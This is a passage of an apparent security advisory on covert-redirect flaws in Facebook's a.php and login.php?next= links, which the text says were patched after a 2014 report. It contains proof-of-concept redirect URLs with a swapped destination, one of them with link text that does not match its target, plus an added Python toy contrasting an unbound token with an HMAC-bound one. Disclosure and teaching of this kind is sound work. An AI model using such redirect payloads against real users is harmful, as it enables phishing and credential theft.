16lxL0Gj_4qs1-<wbr></wbr>58yWgXirMH4AEf8sOEsZc5DTx7yFnd<wbr></wbr>gODvD5NrC-<wbr></wbr>314BIj4pZvMhlljXv89lHRH6pBgyGG<wbr></wbr>Vm-<wbr></wbr>oWBDIF8CuRER1f5ZGbKdsiUcBISdWT<wbr></wbr>ninVzvBdW1mZY0SWzqT21fZmhgVKtd<wbr></wbr>kRf5l_<wbr></wbr>pag7hAmotFK9HI5XHfGicWVqzRyTNi<wbr></wbr>DIYjyVjTv4km2FOEp7WP3w65aVUKP_<wbr></wbr>w</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.facebook.com/a.php?u=http%3A%2F%2Fwww.tetraph.com&mac=AQJllyaGzLYoRoQz&__tn__=%2AB&eid=5967147530925355409.6013336879369.AQKBG5nt468YgKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT21fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYjyVjTv4km2FOEp7WP3w65aVUKP_w" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/a.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&mac=<wbr></wbr>AQJllyaGzLYoRoQz&__tn__=%2AB&<wbr></wbr>eid=5967147530925355409.<wbr></wbr>6013336879369.<wbr></wbr>AQKBG5nt468YgKeiSdgExZQRjwGb9r<wbr></wbr>6EOu-Uc5WPvi-<wbr></wbr>EVHEzadq8YSrgSvUzbMmxKPPfTgM-<wbr></wbr>JrPff7tN38luc-8h16lxL0Gj_4qs1-<wbr></wbr>58yWgXirMH4AEf8sOEsZc5DTx7yFnd<wbr></wbr>gODvD5NrC-<wbr></wbr>314BIj4pZvMhlljXv89lHRH6pBgyGG<wbr></wbr>Vm-<wbr></wbr>oWBDIF8CuRER1f5ZGbKdsiUcBISdWT<wbr></wbr>ninVzvBdW1mZY0SWzqT21fZmhgVKtd<wbr></wbr>kRf5l_<wbr></wbr>pag7hAmotFK9HI5XHfGicWVqzRyTNi<wbr></wbr>DIYjyVjTv4km2FOEp7WP3w65aVUKP_<wbr></wbr>w</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.facebook.com/a.php?u=http%3A%2F%2Fwww.tetraph.com&eid=5967147530925355409.6013336879369.AQKBG5nt468YgKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT21fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYjyVjTv4km2FOEp7WP3w65aVUKP_w" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/a.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&eid=<wbr></wbr>5967147530925355409.<wbr></wbr>6013336879369.<wbr></wbr>AQKBG5nt468YgKeiSdgExZQRjwGb9r<wbr></wbr>6EOu-Uc5WPvi-<wbr></wbr>EVHEzadq8YSrgSvUzbMmxKPPfTgM-<wbr></wbr>JrPff7tN38luc-8h16lxL0Gj_4qs1-<wbr></wbr>58yWgXirMH4AEf8sOEsZc5DTx7yFnd<wbr></wbr>gODvD5NrC-<wbr></wbr>314BIj4pZvMhlljXv89lHRH6pBgyGG<wbr></wbr>Vm-<wbr></wbr>oWBDIF8CuRER1f5ZGbKdsiUcBISdWT<wbr></wbr>ninVzvBdW1mZY0SWzqT21fZmhgVKtd<wbr></wbr>kRf5l_<wbr></wbr>pag7hAmotFK9HI5XHfGicWVqzRyTNi<wbr></wbr>DIYjyVjTv4km2FOEp7WP3w65aVUKP_<wbr></wbr>w</span></a></div>
</div>
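<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Added example (my own Python, not Facebook's code and not part of the original advisory): a toy redirector that shows why finding (3.1) matters and how the login.php?next= wrapping of (3.2) can be audited. The host, key and eid are constructed placeholders; weak_token() mirrors the defect (the check value is independent of "u"), bound_token() binds an HMAC to "u" so a swapped destination is refused, and final_destination() follows same-site wrappers to report where a link really lands.</span></div>

```python
"""Added example, not Facebook's code: a toy redirector contrasting an
authentication value unrelated to the destination (the a.php defect the
advisory describes) with an HMAC bound to `u`, plus a resolver that follows
login.php?next=... wrappers to see where a link really lands."""
import hashlib
import hmac
from typing import Callable, Optional
from urllib.parse import parse_qs, urlencode, urlsplit

KEY = b"constructed-demo-key"      # constructed placeholder; a real key stays server-side
SITE = "social.example.test"       # constructed stand-in for the redirector's host


def query_of(url: str) -> dict:
    """Single-valued query dict (last value wins, as PHP's $_GET does)."""
    return {k: v[-1] for k, v in parse_qs(urlsplit(url).query).items()}


def make_link(path: str, params: dict) -> str:
    """Build https://SITE/<path>?... with every value percent-encoded."""
    return f"https://{SITE}/{path}?{urlencode(params)}"


def weak_token(eid: str) -> str:
    """Mirrors the defect: the check value depends on eid alone, so it
    says nothing about which `u` the link was issued for."""
    return hmac.new(KEY, eid.encode(), hashlib.sha256).hexdigest()


def bound_token(u: str, eid: str) -> str:
    """Hardened form: the MAC covers the destination.  Length prefixes keep
    (u, eid) from being re-split into a different pair with the same bytes."""
    msg = f"{len(u)}:{u}|{len(eid)}:{eid}".encode()
    return hmac.new(KEY, msg, hashlib.sha256).hexdigest()


def weak_allows(url: str) -> bool:
    q = query_of(url)
    return hmac.compare_digest(q.get("tok", ""), weak_token(q.get("eid", "")))


def bound_allows(url: str) -> bool:
    q = query_of(url)
    expected = bound_token(q.get("u", ""), q.get("eid", ""))
    return hmac.compare_digest(q.get("tok", ""), expected)


def final_destination(url: str, allows: Callable[[str], bool]) -> Optional[str]:
    """Follow same-site wrappers the way a browser would: login.php sends the
    user on to `next` after sign-in, a.php redirects to `u` if its token is
    accepted.  Returns the first off-site URL reached, or None if a hop is
    refused or the chain is too long."""
    current = url
    for _ in range(5):                          # bound the wrapper depth
        parts = urlsplit(current)
        if parts.netloc != SITE:
            return current                      # left the site: the real destination
        q = query_of(current)
        if parts.path == "/login.php" and "next" in q:
            current = q["next"]
        elif parts.path == "/a.php" and "u" in q:
            if not allows(current):
                return None                     # token rejected, no redirect
            current = q["u"]
        else:
            return current                      # stays on-site, no redirect
    return None


def scenario() -> dict:
    """Constructed reproduction of the advisory's observations on toy data."""
    eid = "constructed-eid-0001"                # placeholder, not a real eid
    ad = "http://ads.example.test/click?id=1"   # the u the link was issued for
    other = "http://other-site.example.test/"   # a u the link was NOT issued for
    weak_ok = make_link("a.php", {"u": ad, "eid": eid, "tok": weak_token(eid)})
    weak_swapped = make_link("a.php", {"u": other, "eid": eid, "tok": weak_token(eid)})
    bound_ok = make_link("a.php", {"u": ad, "eid": eid, "tok": bound_token(ad, eid)})
    bound_swapped = make_link("a.php", {"u": other, "eid": eid, "tok": bound_token(ad, eid)})
    return {
        "weak_accepts_issued_u": weak_allows(weak_ok),
        "weak_accepts_swapped_u": weak_allows(weak_swapped),     # the advisory's finding
        "bound_accepts_issued_u": bound_allows(bound_ok),
        "bound_accepts_swapped_u": bound_allows(bound_swapped),  # closed by binding to u
        # login.php?next=<a.php link>: where does the chain actually land?
        "weak_login_lands_on": final_destination(
            make_link("login.php", {"next": weak_swapped}), weak_allows),
        "bound_login_lands_on": final_destination(
            make_link("login.php", {"next": bound_swapped}), bound_allows),
    }


if __name__ == "__main__":
    for name, value in scenario().items():
        print(f"{name}: {value}")
```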
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(3.2) Facebook Login Page Covert Redirect Security Vulnerability</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Vulnerable URL Related to Login.php Based on a.php:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa.php%3Fu%3Dhttp%253A%252F%252Fwww.rp.edu.sg%252Fopenhouse2014%252F%253Futm_source%253Dfacebook%2526utm_medium%253Dcpc%2526utm_campaign%253Dopenhouse2014%26mac%3DAQKyRHClixA20iGL%26__tn__%3D%252AB%26eid%3DAQLAHC7szSXhT3FaEBXe5YFsOC0kEM4nN9PlVovdilvuzROStFXoYqptlKpcJAzHNTLpxWAIrmJYsR6RVG_Htk6pgT7Iol6lWHDJvn7Cg5sqigvE_eVS895Eh6fSwxH3fgfWcNDrEl5_lFgRbrJtC71R68rW_VXS9QCN7Po9wTWDnbyZTaXawdrdQyibryvA56Spr5GcUDUboRFxy8YSr2ahUV_goDAQA3OKmCACEn8CmyMrOT5gZq3iwusysdchRxLIv5N82-GMTiDxXXgkDYf1P7XwvklWpfy_cEItZzV5v0P7fRZB3qiq_RDx9jhEzndlJhUJL2aWE0ldPmGKGz9xWyvPaPLOwzBo23GQbpj2ZN_tw9B9tz2l3tGIN1yegd_Wf6PSFIZOuBXfZILvmILcxg3qz4dHx1fmgPZBpf_34mPnMEkgZqbT2WeV_GZKz8RDIg88D3vrmwyMwWxeh3xyGuddjZUjOUjPCUwrgSrWZK3XHRA7TA7tWIsQ4X1bsjx9c72mm8bZmmRBRJwqOcjsW0QEVETs_Cs9pS9QBkgX8yVPJCHuk1v_xkj4EHHH9sNP7a4GRs8olklBTKhCcJ908sVrQVT2I-cQYw2SVU9hWaWWjX2AGt3WpdT2kx6SIPoPQpX5cIC4Lcfaa7EcZFBnoQPv3mR5BNHRFTh_6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBtj5smz0ZeGT5JWvub5ORJ4xzVN0zAW8V4qiKiVFKTEFMZASaZFon41VFCbhxkX0Bi62Ko64PY6uP64tCMWh6yX2o0JMc0mJWFJRp1695OCKgLXf0udRyWDESTyYgJXIlxecCmlwCEbleAsE-wtDXNOfDTXOzApr1sZO_58FBRaw-K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur9G7LfuXrCr5oR1J5LJ8sVupHqsiN7-UqdakiEEIBq750KxVjaAdCyqJp_5EJ-yVMK3f2pMX7cQ2Lw6u434hHimuLN9VDPLkpSiMlPOa8RkarDSred73IfQiv-PluegYDfunZFxj1KvcAlzhVZsL-a52hJmXrOrzKuV0hyZaBLtAIo6AEoXXV30D-6iraSUphkOFzYt3ah6oRrmXLQZKm2E8Cuag5d_rAnwvIr98dn4OSa8Z4MCZemI3uH8cjxr86aE046uTA_Hm1GjYM5l7wkpHknHI8QR2q5Cioo2h6WiUO-jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl18iaN8wkylsTk8aVBn6G1xZadSL0b5R3NgsYfQUVtV0g9slnOLNkgq0NLMAk0kWFs" target="_blank"><span style="color: black; font-family: Arial, Helvetica, 
sans-serif;">https://www.facebook.com/<wbr></wbr>login.php?next=https%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fa.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>rp.edu.sg%252Fopenhouse2014%<wbr></wbr>252F%253Futm_source%<wbr></wbr>253Dfacebook%2526utm_medium%<wbr></wbr>253Dcpc%2526utm_campaign%<wbr></wbr>253Dopenhouse2014%26mac%<wbr></wbr>3DAQKyRHClixA20iGL%26__tn__%<wbr></wbr>3D%252AB%26eid%<wbr></wbr>3DAQLAHC7szSXhT3FaEBXe5YFsOC0k<wbr></wbr>EM4nN9PlVovdilvuzROStFXoYqptlK<wbr></wbr>pcJAzHNTLpxWAIrmJYsR6RVG_<wbr></wbr>Htk6pgT7Iol6lWHDJvn7Cg5sqigvE_<wbr></wbr>eVS895Eh6fSwxH3fgfWcNDrEl5_<wbr></wbr>lFgRbrJtC71R68rW_<wbr></wbr>VXS9QCN7Po9wTWDnbyZTaXawdrdQyi<wbr></wbr>bryvA56Spr5GcUDUboRFxy8YSr2ahU<wbr></wbr>V_<wbr></wbr>goDAQA3OKmCACEn8CmyMrOT5gZq3iw<wbr></wbr>usysdchRxLIv5N82-<wbr></wbr>GMTiDxXXgkDYf1P7XwvklWpfy_<wbr></wbr>cEItZzV5v0P7fRZB3qiq_<wbr></wbr>RDx9jhEzndlJhUJL2aWE0ldPmGKGz9<wbr></wbr>xWyvPaPLOwzBo23GQbpj2ZN_<wbr></wbr>tw9B9tz2l3tGIN1yegd_<wbr></wbr>Wf6PSFIZOuBXfZILvmILcxg3qz4dHx<wbr></wbr>1fmgPZBpf_34mPnMEkgZqbT2WeV_<wbr></wbr>GZKz8RDIg88D3vrmwyMwWxeh3xyGud<wbr></wbr>djZUjOUjPCUwrgSrWZK3XHRA7TA7tW<wbr></wbr>IsQ4X1bsjx9c72mm8bZmmRBRJwqOcj<wbr></wbr>sW0QEVETs_<wbr></wbr>Cs9pS9QBkgX8yVPJCHuk1v_<wbr></wbr>xkj4EHHH9sNP7a4GRs8olklBTKhCcJ<wbr></wbr>908sVrQVT2I-<wbr></wbr>cQYw2SVU9hWaWWjX2AGt3WpdT2kx6S<wbr></wbr>IPoPQpX5cIC4Lcfaa7EcZFBnoQPv3m<wbr></wbr>R5BNHRFTh_<wbr></wbr>6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBt<wbr></wbr>j5smz0ZeGT5JWvub5ORJ4xzVN0zAW8<wbr></wbr>V4qiKiVFKTEFMZASaZFon41VFCbhxk<wbr></wbr>X0Bi62Ko64PY6uP64tCMWh6yX2o0JM<wbr></wbr>c0mJWFJRp1695OCKgLXf0udRyWDEST<wbr></wbr>yYgJXIlxecCmlwCEbleAsE-<wbr></wbr>wtDXNOfDTXOzApr1sZO_58FBRaw-<wbr></wbr>K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur<wbr></wbr>9G7LfuXrCr5oR1J5LJ8sVupHqsiN7-<wbr></wbr>UqdakiEEIBq750KxVjaAdCyqJp_<wbr></wbr>5EJ-<wbr></wbr>yVMK3f2pMX7cQ2Lw6u434hHimuLN9V<wbr></wbr>DPLkpSiMlPOa8RkarDSred73IfQiv-<wbr></wbr>PluegYDfunZFxj1KvcAlzhVZsL-<wbr></wbr>a52hJmXrOrzKuV0hyZaBLtAIo6AEoX<wbr></wbr>XV30D-<wbr></wbr>6iraSUphk
OFzYt3ah6oRrmXLQZKm2E<wbr></wbr>8Cuag5d_<wbr></wbr>rAnwvIr98dn4OSa8Z4MCZemI3uH8cj<wbr></wbr>xr86aE046uTA_<wbr></wbr>Hm1GjYM5l7wkpHknHI8QR2q5Cioo2h<wbr></wbr>6WiUO-<wbr></wbr>jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl<wbr></wbr>18iaN8wkylsTk8aVBn6G1xZadSL0b5<wbr></wbr>R3NgsYfQUVtV0g9slnOLNkgq0NLMAk<wbr></wbr>0kWFs</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa.php%3Fu%3Dhttp%253A%252F%252Fwww.tetraph.com%26mac%3DAQKyRHClixA20iGL%26__tn__%3D%252AB%26eid%3DAQLAHC7szSXhT3FaEBXe5YFsOC0kEM4nN9PlVovdilvuzROStFXoYqptlKpcJAzHNTLpxWAIrmJYsR6RVG_Htk6pgT7Iol6lWHDJvn7Cg5sqigvE_eVS895Eh6fSwxH3fgfWcNDrEl5_lFgRbrJtC71R68rW_VXS9QCN7Po9wTWDnbyZTaXawdrdQyibryvA56Spr5GcUDUboRFxy8YSr2ahUV_goDAQA3OKmCACEn8CmyMrOT5gZq3iwusysdchRxLIv5N82-GMTiDxXXgkDYf1P7XwvklWpfy_cEItZzV5v0P7fRZB3qiq_RDx9jhEzndlJhUJL2aWE0ldPmGKGz9xWyvPaPLOwzBo23GQbpj2ZN_tw9B9tz2l3tGIN1yegd_Wf6PSFIZOuBXfZILvmILcxg3qz4dHx1fmgPZBpf_34mPnMEkgZqbT2WeV_GZKz8RDIg88D3vrmwyMwWxeh3xyGuddjZUjOUjPCUwrgSrWZK3XHRA7TA7tWIsQ4X1bsjx9c72mm8bZmmRBRJwqOcjsW0QEVETs_Cs9pS9QBkgX8yVPJCHuk1v_xkj4EHHH9sNP7a4GRs8olklBTKhCcJ908sVrQVT2I-cQYw2SVU9hWaWWjX2AGt3WpdT2kx6SIPoPQpX5cIC4Lcfaa7EcZFBnoQPv3mR5BNHRFTh_6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBtj5smz0ZeGT5JWvub5ORJ4xzVN0zAW8V4qiKiVFKTEFMZASaZFon41VFCbhxkX0Bi62Ko64PY6uP64tCMWh6yX2o0JMc0mJWFJRp1695OCKgLXf0udRyWDESTyYgJXIlxecCmlwCEbleAsE-wtDXNOfDTXOzApr1sZO_58FBRaw-K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur9G7LfuXrCr5oR1J5LJ8sVupHqsiN7-UqdakiEEIBq750KxVjaAdCyqJp_5EJ-yVMK3f2pMX7cQ2Lw6u434hHimuLN9VDPLkpSiMlPOa8RkarDSred73IfQiv-PluegYDfunZFxj1KvcAlzhVZsL-a52hJmXrOrzKuV0hyZaBLtAIo6AEoXXV30D-6iraSUphkOFzYt3ah6oRrmXLQZKm2E8Cuag5d_rAnwvIr98dn4OSa8Z4MCZemI3uH8cjxr86aE046uTA_Hm1GjYM5l7wkpHknHI8QR2q5Cioo2h6WiUO-jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl18iaN8wkylsTk8aVBn6G1xZadSL0b5R3NgsYfQUVtV0g9slnOLNkgq0NLMAk0kWFs" target="_blank"><span style="color: black; font-family: Arial, Helvetica, 
sans-serif;">https://www.facebook.com/<wbr></wbr>login.php?next=https%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fa.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.stackoverflow.com%26mac%<wbr></wbr>3DAQKyRHClixA20iGL%26__tn__%<wbr></wbr>3D%252AB%26eid%<wbr></wbr>3DAQLAHC7szSXhT3FaEBXe5YFsOC0k<wbr></wbr>EM4nN9PlVovdilvuzROStFXoYqptlK<wbr></wbr>pcJAzHNTLpxWAIrmJYsR6RVG_<wbr></wbr>Htk6pgT7Iol6lWHDJvn7Cg5sqigvE_<wbr></wbr>eVS895Eh6fSwxH3fgfWcNDrEl5_<wbr></wbr>lFgRbrJtC71R68rW_<wbr></wbr>VXS9QCN7Po9wTWDnbyZTaXawdrdQyi<wbr></wbr>bryvA56Spr5GcUDUboRFxy8YSr2ahU<wbr></wbr>V_<wbr></wbr>goDAQA3OKmCACEn8CmyMrOT5gZq3iw<wbr></wbr>usysdchRxLIv5N82-<wbr></wbr>GMTiDxXXgkDYf1P7XwvklWpfy_<wbr></wbr>cEItZzV5v0P7fRZB3qiq_<wbr></wbr>RDx9jhEzndlJhUJL2aWE0ldPmGKGz9<wbr></wbr>xWyvPaPLOwzBo23GQbpj2ZN_<wbr></wbr>tw9B9tz2l3tGIN1yegd_<wbr></wbr>Wf6PSFIZOuBXfZILvmILcxg3qz4dHx<wbr></wbr>1fmgPZBpf_34mPnMEkgZqbT2WeV_<wbr></wbr>GZKz8RDIg88D3vrmwyMwWxeh3xyGud<wbr></wbr>djZUjOUjPCUwrgSrWZK3XHRA7TA7tW<wbr></wbr>IsQ4X1bsjx9c72mm8bZmmRBRJwqOcj<wbr></wbr>sW0QEVETs_<wbr></wbr>Cs9pS9QBkgX8yVPJCHuk1v_<wbr></wbr>xkj4EHHH9sNP7a4GRs8olklBTKhCcJ<wbr></wbr>908sVrQVT2I-<wbr></wbr>cQYw2SVU9hWaWWjX2AGt3WpdT2kx6S<wbr></wbr>IPoPQpX5cIC4Lcfaa7EcZFBnoQPv3m<wbr></wbr>R5BNHRFTh_<wbr></wbr>6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBt<wbr></wbr>j5smz0ZeGT5JWvub5ORJ4xzVN0zAW8<wbr></wbr>V4qiKiVFKTEFMZASaZFon41VFCbhxk<wbr></wbr>X0Bi62Ko64PY6uP64tCMWh6yX2o0JM<wbr></wbr>c0mJWFJRp1695OCKgLXf0udRyWDEST<wbr></wbr>yYgJXIlxecCmlwCEbleAsE-<wbr></wbr>wtDXNOfDTXOzApr1sZO_58FBRaw-<wbr></wbr>K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur<wbr></wbr>9G7LfuXrCr5oR1J5LJ8sVupHqsiN7-<wbr></wbr>UqdakiEEIBq750KxVjaAdCyqJp_<wbr></wbr>5EJ-<wbr></wbr>yVMK3f2pMX7cQ2Lw6u434hHimuLN9V<wbr></wbr>DPLkpSiMlPOa8RkarDSred73IfQiv-<wbr></wbr>PluegYDfunZFxj1KvcAlzhVZsL-<wbr></wbr>a52hJmXrOrzKuV0hyZaBLtAIo6AEoX<wbr></wbr>XV30D-<wbr></wbr>6iraSUphkOFzYt3ah6oRrmXLQZKm2E<wbr></wbr>8Cuag5d_<wbr></wbr>rAnwvIr98dn4OSa8Z4MCZemI3uH8cj<wbr></wbr>xr86aE046uTA_<wbr></wbr>Hm1GjYM5l7wkpHknHI8QR2q5Cioo2h<wbr></wbr
>6WiUO-<wbr></wbr>jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl<wbr></wbr>18iaN8wkylsTk8aVBn6G1xZadSL0b5<wbr></wbr>R3NgsYfQUVtV0g9slnOLNkgq0NLMAk<wbr></wbr>0kWFs</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC Video:</b></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=VvhmxfKt85Q&feature=youtu.be">https://www.youtube.com/watch?v=VvhmxfKt85Q&feature=youtu.be</a></span></div>
</div>
<div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
</div>
<div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Blog Details:</b></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2015/01/facebook-old-generated-urls-still.html">http://securityrelated.blogspot.com/2015/01/facebook-old-generated-urls-still.html</a></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<br /></div>
<div style="margin: 0px;">
<br /></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Those vulnerabilities were reported to Facebook in 2014 and they have been patched.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Several
other similar 0-day vulnerabilities in these products have been found by
other bug hunters before, and Facebook has patched some of
them. "The Full Disclosure mailing list is a public forum for detailed
discussion of vulnerabilities and exploitation techniques, as well as
tools, papers, news, and events of interest to the community. FD differs
from other security lists in its open nature and support for
researchers' right to decide how to disclose their own discovered bugs.
The full disclosure movement has been credited with forcing vendors to
